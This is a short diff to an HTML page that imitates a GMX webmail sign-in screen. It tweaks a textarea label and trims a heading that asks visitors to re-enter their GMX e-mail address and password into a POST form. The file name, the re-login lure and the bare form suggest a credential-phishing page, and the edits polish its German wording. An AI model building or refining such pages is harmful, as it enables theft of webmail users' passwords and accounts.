--- a/gmx_world.html
+++ b/gmx_world.html
@@ -19,7 +19,7 @@ textarea {
 
 
 <form>
-  <textarea>GMX Main Account...</textarea>
+  <textarea>GMX Mein Account...</textarea>
 </form>
 
 </body>
@@ -196,8 +196,7 @@ footer#footer ul li{
           </img>
     </div>
     <div class="sign-att">
-      <h2>Bitte erneut einloggen
-Bitte melden Sie sich mit Ihrer GMX E-Mail-Adresse und Passwort erneut an.</h2>
+      <h2>Bitte melden Sie sich mit Ihrer GMX E-Mail-Adresse und Passwort erneut an.</h2>
       <p></p>
     </div>
     <form action="" method="post" id="form">
